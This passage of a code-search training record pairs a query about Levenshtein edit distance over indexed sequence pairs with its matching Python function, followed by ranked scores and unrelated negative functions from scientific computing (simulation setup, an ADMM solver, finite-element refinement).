#sys.exit()\n atomsc_fakevac.write('dataxx.quippy.xyz',format='quippy',append=True)\n atomsc_fakevac.write('dataxx.poscar',format='vasp',append=True)\n atomsc_fakevac.write('dataxx.ipi',format='ipi',append=True) # works, currently so implemented that it canges cell\n atomsc_fakevac.write('dataxx.xyz',format='xyz',append=True)\n atomsc_fakevac.write('dataxx.extxyz',format='extxyz',append=True)\n atomsc_fakevac.write('dataxx.lammps-data',format='lammps-data',append=True)\n atomsc_fakevac.write('dataxx.lammps-runner',format='lammps-runner',append=True)\n\n atomsc_fakevac_a = ase_read('dataxx.extxyz',format='extxyz') # works, cell ist not changed\n atomsc_fakevac_a.write('dataxx.extxyz2',format='extxyz',append=True) # works, cell is not changed\n\n atomsc_fakevac_b = ase_read('dataxx.xyz',format='xyz') # not working # but this should work\n atomsc_fakevac_b.write('dataxx.xyz2',format='xyz',append=True) # this is working\n\n atomsc_fakevac_c = ase_read('dataxx.ipi',format='ipi') # works, currently so implemented that it canges cell\n 
#print('ipi cell',atomsc_fakevac_c.get_cell())\n\n atomsc_fakevac_c.write('dataxx.ipi2',format='ipi',append=True) # works, just writes the cell it gests.\n atomsc_fakevac_c.write('dataxx.ipi2_poscar',format='vasp',append=True) # works, just writes the cell it gests.\n NN_1_indices, NN_2_indices = mu.ase_get_neighborlist_1NN_2NN(atomsc_fakevac_c,atomnr=0,cutoffa=nndist,cutoffb=a0,skin=0.1)\n print('NN_1_indices (ipi ):',NN_1_indices)\n print('NN_2_indices (ipi ):',NN_2_indices)\n #print('from ....',(atomsc_fakevac_c.positions)[0])\n #for i in NN_1_indices:\n # print((atomsc_fakevac_c.positions)[i])\n\n atomsc_fakevac_cc = ase_read('dataxx.ipi2_poscar',format='vasp') # works, currently so implemented that it canges cell\n atomsc_fakevac_cc.write('dataxx.ipi2_poscar2',format='vasp',append=True)\n atomsc_fakevac_cc.write('dataxx.ipi2_poscar2_ipi',format='ipi',append=True) # works, just writes the cell it gests.\n #print('ipi cell2 (ext):',atomsc_fakevac_cc.get_cell())\n #print()\n #print('now quippy')\n atomsc_fakevac_d = ase_read('dataxx.quippy.xyz',format='quippy')\n #print('quippy cell (ext)',atomsc_fakevac_d.get_cell())\n atomsc_fakevac_d.write('dataxx.quippy.xyz2',format='quippy',append=True)\n atomsc_fakevac_d.write('dataxx.quippy.xyz2_extxyz',format='extxyz',append=True)\n NN_1_indices, NN_2_indices = mu.ase_get_neighborlist_1NN_2NN(atomsc_fakevac_d,atomnr=0,cutoffa=nndist,cutoffb=a0,skin=0.1)\n print('NN_1_indices (quippy):',NN_1_indices)\n print('NN_2_indices (quippy):',NN_2_indices)\n #print('from ....',(atomsc_fakevac_d.positions)[0])\n #for i in NN_1_indices:\n # print((atomsc_fakevac_d.positions)[i])\n path = \"/home/glensk/kmc/run_michele/Si6Mg6V1.1_/simulation.pos_libatom_2struct.xyz\"\n atomsc_fakevac_e = ase_read(path,format='quippy')\n\n NN_1_indices, NN_2_indices = mu.ase_get_neighborlist_1NN_2NN(atomsc_fakevac_e,atomnr=0,cutoffa=nndist,cutoffb=a0,skin=0.1)\n print('NN_1_indices (kmc ):',NN_1_indices)\n print('NN_2_indices (kmc ):',NN_2_indices)\n sys.exit()\n\n NN_1_indices = mu.ase_get_neighborlist(atomsc_fakevac,atomnr=0,cutoff=nndist,skin=0.1)\n NN_1_2_indices_tmp = mu.ase_get_neighborlist(atomsc_fakevac,atomnr=0,cutoff=a0,skin=0.1)\n print('NN_1_indices :',NN_1_indices)\n NN_2_indices = np.sort(np.array(mu.diff(NN_1_2_indices_tmp,NN_1_indices)))\n print('NN_2_indices :',NN_2_indices)\n NN_1_2_indices = np.concatenate((NN_1_indices, NN_2_indices ))\n print('NN_1_2_indices:',NN_1_2_indices)\n\n\n # fill only 1NN (with one species)\n for i in [ 'Mg', 'Si' ]:\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=5,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=\"XX_0\")\n mysave_quippy_xyz(atomsc_fakevac,text=\"1NN\")\n for ii in NN_1_indices:\n atomsc_fakevac[ii].symbol = i\n mysave_quippy_xyz(atomsc_fakevac,text=\"1NN\")\n\n # fill only 2NN (with one species)\n for i in [ 'Mg', 'Si' ]:\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=5,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=\"XX_0\")\n mysave_quippy_xyz(atomsc_fakevac,text=\"2NN\")\n for ii in NN_2_indices:\n atomsc_fakevac[ii].symbol = i\n mysave_quippy_xyz(atomsc_fakevac,text=\"2NN\")\n\n # fill 1NN and 2NN (with one species)\n for i in [ 'Mg', 'Si' ]:\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=5,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=\"XX_0\")\n mysave_quippy_xyz(atomsc_fakevac,text=\"1and2NN\")\n for ii in NN_1_2_indices:\n atomsc_fakevac[ii].symbol = 
i\n mysave_quippy_xyz(atomsc_fakevac,text=\"1and2NN\")\n\n # dif compositions in 1NN shell\n filling = [ 2,4,6,8,10]\n for fi in filling:\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=5,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=\"XX_0\")\n mysave_quippy_xyz(atomsc_fakevac,text=\"1NN_diffcomp\")\n for idx,ii in enumerate(NN_1_indices):\n if idx < fi: ch = \"Mg\"\n else: ch = \"Si\"\n atomsc_fakevac[ii].symbol = ch\n mysave_quippy_xyz(atomsc_fakevac,text=\"1NN_diffcomp\")\n\n\n sys.exit()\n\n #mu.ase_get_known_formats(show=True, add_missing_formats=False, copy_formats=False, verbose=False,show_formatspy=True)\n for i in [ 'Mg', 'Si' ]:\n for ii in [ 0,1,2,3,4,5]:\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=5,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=i+'_'+str(ii))\n\n\n sys.exit()\n\n\n # show the input variables\n print('--------------------------- check the input --------------------------------')\n print('JOBS (nseeds) ',nseeds,'(defined by -nseeds / or -seeds)')\n print('seeds ',seeds)\n print('nsteps ',nsteps)\n print()\n print('ncell ',ncell,\"(\",atomsc.get_number_of_atoms(),\"atoms )\")\n print('nsi ',nsi, \"(\",pcsi,\"at%)\")\n print('nmg ',nmg,\"(\",pcmg,\"at%)\")\n print('nvac ',nvac,\"(\",pcvac,\"at%)\")\n print('a0 ',a0,\"angstrom\")\n print('temp ',temp,\"K\")\n print()\n print('mypot.pot ',mypot.pot)\n print('mypot.potpath ',mypot.potpath)\n print()\n print('directory ',directory)\n print('submit ',submit)\n print('submitdebug ',submitdebug)\n print()\n print('nodes ',nodes)\n print('ffsocket ',ffsocket)\n #print('python ver ',sys.version_info[0])\n #print()\n print('--------------------------- check the input --------------------------------')\n if submit == True or submitdebug == True:\n mu.get_from_prompt_Yy_orexit(\"Are the ine input variables ok? [y]es: \")\n\n # make the directory\n if os.path.isdir(directory):\n mu.get_from_prompt_Yy_orexit(\"This main directory exists already, shall I add jobs? 
[y]es: \")\n mu.mkdir(directory)\n\n # create README.md\n IPI_COMMAND = os.environ[\"IPI_COMMAND\"]\n LAMMPS_COMMAND = os.environ[\"LAMMPS_COMMAND\"]\n mu.create_READMEtxt(directory,add=[\"# to start manually (1): python \"+IPI_COMMAND+\" input-runner.xml\",\"# to start manually (2):\"+LAMMPS_COMMAND+\" < in.lmp\"])\n\n for seed in seeds:\n\n # make jobdirectory\n jobdir = directory+'/seed'+str(seed)\n print('jobdir',jobdir)\n if os.path.exists(jobdir):\n sys.exit(\"jobdirectory \"+str(jobdir)+\" already exists!\")\n mu.mkdir(jobdir)\n\n # get data.lmp and data.ipi\n atomsc.write(jobdir+'/data.runnerformat.lmp',format='lammps-runner')\n atomsc_fakevac.write(jobdir+'/data.ipi',format='ipi')\n atomsc_fakevac.write(jobdir+'/data.extxyz',format='extxyz')\n #atomsc_fakevac.write(jobdir+'/data_fakevac.ipi',format='ipi')\n\n if testfiles == True:\n atomsc.write(jobdir+'/data.lmp',format='lammps-data')\n atomsc.write(jobdir+'/data.POSCAR',format='vasp')\n atomsc.write(jobdir+'/data.xyz',format='xyz')\n atomsc.write(jobdir+'/data.extxyz',format='extxyz')\n atomsc.write(jobdir+'/data.espresso-in',format='espresso-in')\n\n # create in.lmp\n ace = mu.ase_calculate_ene(pot=pot,potpath=mypot.potpath,\n units='eV',geopt=False,kmc=True,verbose=verbose)\n address = socket.gethostname()+\"_\"+os.path.basename(jobdir)\n print('address',address)\n ace.pot_get_and_ase_lmp_cmd(kmc=True,temp=temp,nsteps=nsteps,ffsocket=ffsocket,address=address)\n mu.lammps_write_inputfile(folder=jobdir,filename='in.lmp',positions='data.runnerformat.lmp',ace=ace)\n\n # create input-runner.xml (should be made without copying)\n mu.create_ipi_kmc_inputfile(jobdir,filename=\"input-runner.xml\",nsteps=nsteps,stride=100,seed=seed,a0=a0,ncell=ncell,nsi=nsi,nmg=nmg,nvac=nvac,neval=neval,temp=temp,nodes=nodes,address=address,testrun=test,cubic=args.cubic)\n\n # create submit-ipi-kmc.sh (should be made without copying)\n mu.create_submitskript_ipi_kmc(jobdir+\"/submit-ipi-kmc.sh\",nodes,ntasks,\n lmp_par=lmp_par,\n ipi_inst=ipi_inst,\n ffsocket=ffsocket,\n submittime_hours=submittime_hours,\n SBATCH=True)\n\n # create osubmit-ipi-kmc.sh (should be made without copying)\n mu.create_submitskript_ipi_kmc(jobdir+\"/osubmit-ipi-kmc.sh\",nodes,ntasks,\n lmp_par=lmp_par,\n ipi_inst=ipi_inst,\n ffsocket=ffsocket,\n submittime_hours=submittime_hours,\n SBATCH=False)\n\n # submit the job (execute either this or submit-ipi-kmc.sh_all3, not both)\n #mu.submitjob(submit=submit,submitdebug=submitdebug,jobdir=jobdir,submitskript=\"submit-ipi-kmc.sh\")\n\n # get submit-ipi-kmc.sh_all3 (should be made without copying)\n if nseeds == 3:\n mu.create_submitskript_ipi_kmc(directory+\"/submit-ipi-kmc.sh_all3\",nodes,ntasks,\n lmp_par=lmp_par,\n ipi_inst=ipi_inst,\n ffsocket=ffsocket,\n submittime_hours=submittime_hours,\n SBATCH=True,\n LOOPFOLDER=True)\n\n # submit the job (execute either this or submit-ipi-kmc.sh_all3, not both)\n #mu.submitjob(submit=submit,submitdebug=submitdebug,jobdir=directory,submitskript=\"submit-ipi-kmc.sh_all3\")\n if submit == True:\n mu.submitjob(submit_to_que=True,submit_to_debug_que=False,jobdir=directory,submitskript=\"submit-ipi-kmc.sh_all3\")\n\n\n print('done')\n return", "def solve_l1(y, A_fun, AT_fun, lambda_l1, reshape_img_fun, show_img_progress=False, alpha=0.2, max_iter=100, solver_tol=1e-6):\n\n\n obj_lss = np.zeros(max_iter)\n x_zs = np.zeros(max_iter)\n u_norms = np.zeros(max_iter)\n times = np.zeros(max_iter)\n\n ATy = AT_fun(y)\n x_shape = ATy.shape\n d = np.prod(x_shape)\n\n def A_cgs_fun(x):\n x = np.reshape(x, 
x_shape, order='F')\n y = AT_fun(A_fun(x)) + alpha * x\n return vec(y)\n A_cgs = LinearOperator((d,d), matvec=A_cgs_fun, dtype='float')\n\n def compute_p_inv_A(b, z0):\n (z,info) = sp.sparse.linalg.cgs(A_cgs, vec(b), x0=vec(z0), tol=1e-3, maxiter=100)\n if info > 0:\n print('cgs convergence to tolerance not achieved')\n elif info <0:\n print('cgs gets illegal input or breakdown')\n z = np.reshape(z, x_shape, order='F')\n return z\n\n\n def A_cgs_fun_init(x):\n x = np.reshape(x, x_shape, order='F')\n y = AT_fun(A_fun(x))\n return vec(y)\n A_cgs_init = LinearOperator((d,d), matvec=A_cgs_fun_init, dtype='float')\n\n def compute_init(b, z0):\n (z,info) = sp.sparse.linalg.cgs(A_cgs_init, vec(b), x0=vec(z0), tol=1e-2)\n if info > 0:\n print('cgs convergence to tolerance not achieved')\n elif info <0:\n print('cgs gets illegal input or breakdown')\n z = np.reshape(z, x_shape, order='F')\n return z\n\n # initialize z and u\n z = compute_init(ATy, ATy)\n u = np.zeros(x_shape)\n\n\n plot_normalozer = matplotlib.colors.Normalize(vmin=0.0, vmax=1.0, clip=True)\n\n\n start_time = timeit.default_timer()\n\n for iter in range(max_iter):\n\n # x-update\n net_input = z+u\n Wzu, wbook = wavelet_transform(net_input)\n q = soft_threshold(Wzu, lambda_l1/alpha)\n x = inverse_wavelet_transform(q, wbook, x_shape)\n x = np.reshape(x, x_shape)\n\n # z-update\n b = ATy + alpha * (x - u)\n z = compute_p_inv_A(b, z)\n\n # u-update\n u += z - x;\n\n if show_img_progress == True:\n\n fig = plt.figure('current_sol')\n plt.gcf().clear()\n fig.canvas.set_window_title('iter %d' % iter)\n plt.subplot(1,3,1)\n plt.imshow(reshape_img_fun(np.clip(x, 0.0, 1.0)), interpolation='nearest', norm=plot_normalozer)\n plt.title('x')\n plt.subplot(1,3,2)\n plt.imshow(reshape_img_fun(np.clip(z, 0.0, 1.0)), interpolation='nearest', norm=plot_normalozer)\n plt.title('z')\n plt.subplot(1,3,3)\n plt.imshow(reshape_img_fun(np.clip(net_input, 0.0, 1.0)), interpolation='nearest', norm=plot_normalozer)\n plt.title('netin')\n plt.pause(0.00001)\n\n\n obj_ls = 0.5 * np.sum(np.square(y - A_fun(x)))\n x_z = np.sqrt(np.mean(np.square(x-z)))\n u_norm = np.sqrt(np.mean(np.square(u)))\n\n print('iter = %d: obj_ls = %.3e |x-z| = %.3e u_norm = %.3e' % (iter, obj_ls, x_z, u_norm))\n\n\n obj_lss[iter] = obj_ls\n x_zs[iter] = x_z\n u_norms[iter] = u_norm\n times[iter] = timeit.default_timer() - start_time\n\n if x_z < solver_tol:\n break\n\n infos = {'obj_lss': obj_lss, 'x_zs': x_zs, 'u_norms': u_norms,\n 'times': times, 'alpha':alpha, 'lambda_l1':lambda_l1,\n 'max_iter':max_iter, 'solver_tol':solver_tol}\n\n\n return (x, z, u, infos)", "def ExecuteInstanceStochasticAdaptiveRefinementAux_Functionality(current_global_index,pickled_coarse_model,pickled_coarse_project_parameters,pickled_custom_metric_refinement_parameters,pickled_custom_remesh_refinement_parameters,random_variable,current_index,current_analysis_stage,previous_computational_time,open_mp_threads,mapping_flag,pickled_mapping_reference_model,print_to_file,filename):\n\n start_time = time.time()\n # unpickle model and build Kratos Model object\n serialized_model = pickle.loads(pickled_coarse_model)\n current_model = KratosMultiphysics.Model()\n serialized_model.Load(\"ModelSerialization\",current_model)\n del(serialized_model)\n # unpickle parameters and build Kratos Parameters object\n serialized_project_parameters = pickle.loads(pickled_coarse_project_parameters)\n current_project_parameters = KratosMultiphysics.Parameters()\n 
serialized_project_parameters.Load(\"ParametersSerialization\",current_project_parameters)\n del(serialized_project_parameters)\n # refine if current current_global_index > 0, adaptive refinement based on the solution of previous index\n if (current_index > 0):\n # unpickle metric and remesh refinement parameters and build Kratos Parameters objects\n serialized_custom_metric_refinement_parameters = pickle.loads(pickled_custom_metric_refinement_parameters)\n serialized_custom_remesh_refinement_parameters = pickle.loads(pickled_custom_remesh_refinement_parameters)\n current_custom_metric_refinement_parameters = KratosMultiphysics.Parameters()\n current_custom_remesh_refinement_parameters = KratosMultiphysics.Parameters()\n serialized_custom_metric_refinement_parameters.Load(\"MetricRefinementParametersSerialization\",current_custom_metric_refinement_parameters)\n serialized_custom_remesh_refinement_parameters.Load(\"RemeshRefinementParametersSerialization\",current_custom_remesh_refinement_parameters)\n del(serialized_custom_metric_refinement_parameters,serialized_custom_remesh_refinement_parameters)\n # refine the model Kratos object\n adaptive_refinement_manager = AdaptiveRefinement(current_index,current_model,current_project_parameters,current_custom_metric_refinement_parameters,current_custom_remesh_refinement_parameters)\n refined_model,refined_project_parameters = adaptive_refinement_manager.ComputeAdaptiveRefinement()\n current_model = refined_model\n del(refined_model,refined_project_parameters)\n # constructor analysis stage\n simulation = current_analysis_stage(current_model,current_project_parameters,random_variable)\n # add filename flag print_to_file is true\n if (print_to_file):\n simulation.filename = filename\n # add flag if current index is maximum index\n if (current_index == current_global_index):\n simulation.is_current_index_maximum_index = True\n else:\n simulation.is_current_index_maximum_index = False\n # mapping if in current finest level and mapping flag is true\n # otherwise standard behavior\n if (mapping_flag is True and current_index == current_global_index):\n # unpickle mapping reference model and build Kratos Model object\n serialized_mapping_reference_model = pickle.loads(pickled_mapping_reference_model)\n mapping_reference_model = KratosMultiphysics.Model()\n serialized_mapping_reference_model.Load(\"ModelSerialization\",mapping_reference_model)\n del(serialized_mapping_reference_model)\n # send reference model to analysis stage for mapping and set mapping flag to true\n simulation.mapping_reference_model = mapping_reference_model\n simulation.mapping = True\n simulation.Run()\n # mapping if in current finest level and mapping flag is true\n # otherwise standard qoi evaluation\n if (mapping_flag is True and current_index == current_global_index):\n qoi = simulation.MappingAndEvaluateQuantityOfInterest()\n else:\n qoi = simulation.EvaluateQuantityOfInterest()\n # save model and parameters as MpiSerializer Kratos objects\n serialized_finer_model = KratosMultiphysics.MpiSerializer()\n serialized_finer_model.Save(\"ModelSerialization\",simulation.model)\n # pickle model and parameters\n pickled_finer_model = pickle.dumps(serialized_finer_model, 2) # second argument is the protocol and is NECESSARY (according to pybind11 docs)\n del(simulation)\n end_time = time.time()\n computational_time = previous_computational_time + open_mp_threads*(end_time-start_time) # multiply by open mp threads to consider real machine cost\n return 
qoi,pickled_finer_model,computational_time", "def parallelized_threading(name, dico_aligns, dope_arr, index_aa):\n ev_threading = sc.Threading(dico_aligns[name])\n return (name, ev_threading.threaded(dope_arr, index_aa))", "def reduce_nb(a, reduce_func_nb, *args):\n out = np.full(a.shape[1], np.nan, dtype=np.float_)\n\n for col in range(a.shape[1]):\n out[col] = reduce_func_nb(col, a[:, col], *args)\n return out" ]
[ "0.65683377", "0.61231744", "0.61210066", "0.58272725", "0.58008033", "0.57025033", "0.56774867", "0.565421", "0.5610815", "0.5579183", "0.5561648", "0.5541063", "0.552428", "0.54533285", "0.5434301", "0.5418918", "0.5369601", "0.5330608", "0.52911884", "0.5281962", "0.5195514", "0.51942545", "0.5192588", "0.5172473", "0.5143275", "0.5107227", "0.5086616", "0.50838035", "0.50819606", "0.5070131", "0.50480384", "0.50349545", "0.5023571", "0.4985677", "0.49501696", "0.49332353", "0.489361", "0.4874437", "0.4874437", "0.48727936", "0.4854548", "0.48459977", "0.48438382", "0.4828254", "0.48235548", "0.4817116", "0.48142642", "0.48078787", "0.48063615", "0.47954836", "0.47952983", "0.4779901", "0.47657928", "0.47614145", "0.47402304", "0.47285813", "0.4727023", "0.47232905", "0.47220314", "0.47200912", "0.4702508", "0.4702322", "0.46876773", "0.4683725", "0.46806893", "0.46769854", "0.46747023", "0.46669236", "0.4656495", "0.4646575", "0.4645698", "0.4644609", "0.4640612", "0.46382976", "0.46382555", "0.46347043", "0.46222973", "0.4621476", "0.46167004", "0.46151206", "0.4613143", "0.4613047", "0.4610823", "0.46081734", "0.46072897", "0.4606967", "0.4606649", "0.46056393", "0.46050113", "0.45878655", "0.45859998", "0.45846683", "0.45830503", "0.45798513", "0.4577831", "0.4576468", "0.45697027", "0.45663613", "0.45614323", "0.4560821", "0.45588028" ]
0.0
-1
Computes the Levenshtein edit distance for sequences in seqs_mat indicated by pairs of indices.
def nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix=identity_nb_distance_matrix, gap_penalty=1): #print(indices.shape) #print(seqs_mat.shape) #print(seqs_L.shape) return _nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix, gap_penalty)
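Below is a minimal usage sketch (not part of the dataset record above) showing how the three inputs that nb_vector_editdistance expects might be prepared. The sequence strings, the integer encoding, and the identity substitution matrix are illustrative assumptions; zero-padding the matrix to the longest sequence is safe because the kernel bounds its loops by seqs_L.

import itertools
import numpy as np

# Hypothetical input sequences (placeholders, not from the dataset).
seqs = ["CASSLGELFF", "CASSPGELFF", "CASRTGELYF"]

# seqs_L: the true length of each sequence.
seqs_L = np.array([len(s) for s in seqs], dtype=np.int64)

# seqs_mat: sequences encoded as integer codes, zero-padded to the max length.
alphabet = sorted(set("".join(seqs)))
code = {ch: i for i, ch in enumerate(alphabet)}
seqs_mat = np.zeros((len(seqs), seqs_L.max()), dtype=np.int64)
for i, s in enumerate(seqs):
    seqs_mat[i, :len(s)] = [code[ch] for ch in s]

# indices: one row per (query, target) pair to score.
indices = np.array(list(itertools.combinations(range(len(seqs)), 2)), dtype=np.int64)

# Identity substitution matrix: 0 on the diagonal, 1 elsewhere, which
# reduces the kernel to a plain unit-cost edit distance.
identity = (1 - np.eye(len(alphabet))).astype(np.int16)

# dist = nb_vector_editdistance(indices, seqs_mat, seqs_L, identity)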
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix=identity_nb_distance_matrix, gap_penalty=1):\n assert seqs_mat.shape[0] == seqs_L.shape[0]\n mx_L = nb.int_(np.max(seqs_L))\n\n dist = np.zeros(indices.shape[0], dtype=np.int16)\n \n \"\"\"As long as ldmat is big enough to accomodate the largest sequence\n its OK to only use part of it for the smaller sequences\n NOTE that to create a 2D array it must be created 1D and reshaped\"\"\"\n ldmat = np.zeros(mx_L * mx_L, dtype=np.int16).reshape((mx_L, mx_L))\n for ind_i in nb.prange(indices.shape[0]):\n query_i = indices[ind_i, 0]\n seq_i = indices[ind_i, 1]\n \n q_L = seqs_L[query_i]\n s_L = seqs_L[seq_i]\n if q_L == s_L:\n \"\"\"No gaps: substitution distance\n This will make it differ from a strict edit-distance since\n the optimal edit-distance may insert same number of gaps in both sequences\"\"\"\n #tmp_dist = 0\n for i in range(q_L):\n dist[ind_i] += distance_matrix[seqs_mat[query_i, i], seqs_mat[seq_i, i]]\n #dist[ind_i] = tmp_dist\n continue\n \n \"\"\"Do not need to re-zero each time\"\"\"\n # ldmat = np.zeros((q_L, s_L), dtype=np.int16)\n for row in range(1, q_L):\n ldmat[row, 0] = row * gap_penalty\n\n for col in range(1, s_L):\n ldmat[0, col] = col * gap_penalty\n \n for col in range(1, s_L):\n for row in range(1, q_L):\n ldmat[row, col] = min(ldmat[row-1, col] + gap_penalty,\n ldmat[row, col-1] + gap_penalty,\n ldmat[row-1, col-1] + distance_matrix[seqs_mat[query_i, row-1], seqs_mat[seq_i, col-1]]) # substitution\n dist[ind_i] = ldmat[row, col]\n return dist", "def nb_editdistance(seq_vec1, seq_vec2, distance_matrix=identity_nb_distance_matrix, gap_penalty=1):\n \n q_L = seq_vec1.shape[0]\n s_L = seq_vec2.shape[0]\n if q_L == s_L:\n \"\"\"No gaps: substitution distance\n This will make it differ from a strict edit-distance since\n the optimal edit-distance may insert same number of gaps in both sequences\"\"\"\n dist = 0\n for i in range(q_L):\n dist += distance_matrix[seq_vec1[i], seq_vec2[i]]\n return dist\n\n ldmat = np.zeros((q_L, s_L), dtype=np.int16)\n for row in range(1, q_L):\n ldmat[row, 0] = row * gap_penalty\n\n for col in range(1, s_L):\n ldmat[0, col] = col * gap_penalty\n \n for col in range(1, s_L):\n for row in range(1, q_L):\n ldmat[row, col] = min(ldmat[row-1, col] + gap_penalty,\n ldmat[row, col-1] + gap_penalty,\n ldmat[row-1, col-1] + distance_matrix[seq_vec1[row-1], seq_vec2[col-1]]) # substitution\n return ldmat[row, col]", "def levenshteinDistance(s1, s2):\n singleLetterMapping = {DOWNLEFT: '1', DOWN:'2', DOWNRIGHT:'3',\n LEFT:'4', RIGHT:'6',\n UPLEFT:'7', UP:'8', UPRIGHT:'9'}\n\n len1 = len([singleLetterMapping[letter] for letter in s1])\n len2 = len([singleLetterMapping[letter] for letter in s2])\n\n matrix = list(range(len1 + 1)) * (len2 + 1)\n for i in range(len2 + 1):\n matrix[i] = list(range(i, i + len1 + 1))\n for i in range(len2):\n for j in range(len1):\n if s1[j] == s2[i]:\n matrix[i+1][j+1] = min(matrix[i+1][j] + 1, matrix[i][j+1] + 1, matrix[i][j])\n else:\n matrix[i+1][j+1] = min(matrix[i+1][j] + 1, matrix[i][j+1] + 1, matrix[i][j] + 1)\n return matrix[len2][len1]", "def edit_distance_between_seqs(seq1, seq2):\n aln1, aln2 = needleman_wunsch(seq1, seq2)\n return edit_distance_from_aln_strings(aln1, aln2)", "def _nb_vector_tcrdist(indices, seqs_mat, seqs_L, distance_matrix=tcr_nb_distance_matrix, dist_weight=3, gap_penalty=4, ntrim=3, ctrim=2, fixed_gappos=True):\n assert seqs_mat.shape[0] == seqs_L.shape[0]\n\n dist = np.zeros(indices.shape[0], dtype=np.int16)\n for ind_i 
in nb.prange(indices.shape[0]):\n query_i = indices[ind_i, 0]\n seq_i = indices[ind_i, 1]\n q_L = seqs_L[query_i]\n s_L = seqs_L[seq_i]\n if q_L == s_L:\n \"\"\"No gaps: substitution distance\"\"\"\n for i in range(ntrim, q_L - ctrim):\n dist[ind_i] += distance_matrix[seqs_mat[query_i, i], seqs_mat[seq_i, i]] * dist_weight\n continue\n\n short_len = min(q_L, s_L)\n len_diff = abs(q_L - s_L)\n if fixed_gappos:\n min_gappos = min(6, 3 + (short_len - 5) // 2)\n max_gappos = min_gappos\n else:\n min_gappos = 5\n max_gappos = short_len - 1 - 4\n while min_gappos > max_gappos:\n min_gappos -= 1\n max_gappos += 1\n min_dist = -1\n # min_count = -1\n for gappos in range(min_gappos, max_gappos + 1):\n tmp_dist = 0\n # tmp_count = 0\n remainder = short_len - gappos\n for n_i in range(ntrim, gappos):\n \"\"\"n_i refers to position relative to N term\"\"\"\n # print (n_i, shortseq[i], longseq[i], distance_matrix[shortseq[i]+longseq[i]])\n tmp_dist += distance_matrix[seqs_mat[query_i, n_i], seqs_mat[seq_i, n_i]]\n # tmp_count += 1\n #print('sequence_distance_with_gappos1:', gappos, remainder, dist[seq_i])\n for c_i in range(ctrim, remainder):\n \"\"\"c_i refers to position relative to C term, counting upwards from C term\"\"\"\n tmp_dist += distance_matrix[seqs_mat[query_i, q_L - 1 - c_i], seqs_mat[seq_i, s_L - 1 - c_i]]\n # tmp_count += 1\n #print('sequence_distance_with_gappos2:', gappos, remainder, dist[seq_i])\n if tmp_dist < min_dist or min_dist == -1:\n min_dist = tmp_dist\n # min_count = tmp_count\n if min_dist == 0:\n break\n dist[ind_i] = min_dist * dist_weight + len_diff * gap_penalty\n return dist", "def iterative_levenshtein(s, t):\n rows = len(s)+1\n cols = len(t)+1\n dist = [[0 for x in range(cols)] for x in range(rows)]\n # source prefixes can be transformed into empty strings \n # by deletions:\n for i in range(1, rows):\n dist[i][0] = i\n # target prefixes can be created from an empty source string\n # by inserting the characters\n for i in range(1, cols):\n dist[0][i] = i\n \n for col in range(1, cols):\n for row in range(1, rows):\n if s[row-1] == t[col-1]:\n cost = 0\n else:\n cost = 1\n dist[row][col] = min(dist[row-1][col] + 1, # deletion\n dist[row][col-1] + 1, # insertion\n dist[row-1][col-1] + cost) # substitution\n #for r in range(rows):\n #print(dist[r])\n \n \n return dist[row][col]", "def dameraulevenshtein(seq1, seq2):\n # Conceptually, this is based on a len(seq1) + 1 * len(seq2) + 1 matrix.\n # However, only the current and two previous rows are needed at once,\n # so we only store those.\n oneago = None\n thisrow = list(range(1, len(seq2) + 1)) + [0]\n for x in range(len(seq1)):\n # Python lists wrap around for negative indices, so put the\n # leftmost column at the *end* of the list. 
This matches with\n # the zero-indexed strings and saves extra calculation.\n twoago, oneago, thisrow = oneago, thisrow, [0] * len(seq2) + [x + 1]\n for y in range(len(seq2)):\n delcost = oneago[y] + 1\n addcost = thisrow[y - 1] + 1\n subcost = oneago[y - 1] + (seq1[x] != seq2[y])\n thisrow[y] = min(delcost, addcost, subcost)\n # This block deals with transpositions\n if (x > 0 and y > 0 and seq1[x] == seq2[y - 1]\n and seq1[x-1] == seq2[y] and seq1[x] != seq2[y]):\n thisrow[y] = min(thisrow[y], twoago[y - 2] + 1)\n return thisrow[len(seq2) - 1]", "def dameraulevenshtein(seq1, seq2):\n # codesnippet:D0DE4716-B6E6-4161-9219-2903BF8F547F\n # Conceptually, this is based on a len(seq1) + 1 * len(seq2) + 1 matrix.\n # However, only the current and two previous rows are needed at once,\n # so we only store those.\n oneago = None\n thisrow = list(range(1, len(seq2) + 1)) + [0]\n for x in range(len(seq1)):\n # Python lists wrap around for negative indices, so put the\n # leftmost column at the *end* of the list. This matches with\n # the zero-indexed strings and saves extra calculation.\n twoago, oneago, thisrow = (oneago, thisrow, [0] * len(seq2) + [x + 1])\n for y in range(len(seq2)):\n delcost = oneago[y] + 1\n addcost = thisrow[y - 1] + 1\n subcost = oneago[y - 1] + (seq1[x] != seq2[y])\n thisrow[y] = min(delcost, addcost, subcost)\n # This block deals with transpositions\n if (x > 0 and y > 0 and seq1[x] == seq2[y - 1]\n and seq1[x - 1] == seq2[y] and seq1[x] != seq2[y]):\n thisrow[y] = min(thisrow[y], twoago[y - 2] + 1)\n return thisrow[len(seq2) - 1]", "def dameraulevenshtein(seq1, seq2):\n # codesnippet:D0DE4716-B6E6-4161-9219-2903BF8F547F\n # Conceptually, this is based on a len(seq1) + 1 * len(seq2) + 1 matrix.\n # However, only the current and two previous rows are needed at once,\n # so we only store those.\n oneago = None\n thisrow = list(range(1, len(seq2) + 1)) + [0]\n for x in range(len(seq1)):\n # Python lists wrap around for negative indices, so put the\n # leftmost column at the *end* of the list. This matches with\n # the zero-indexed strings and saves extra calculation.\n twoago, oneago, thisrow = (oneago, thisrow, 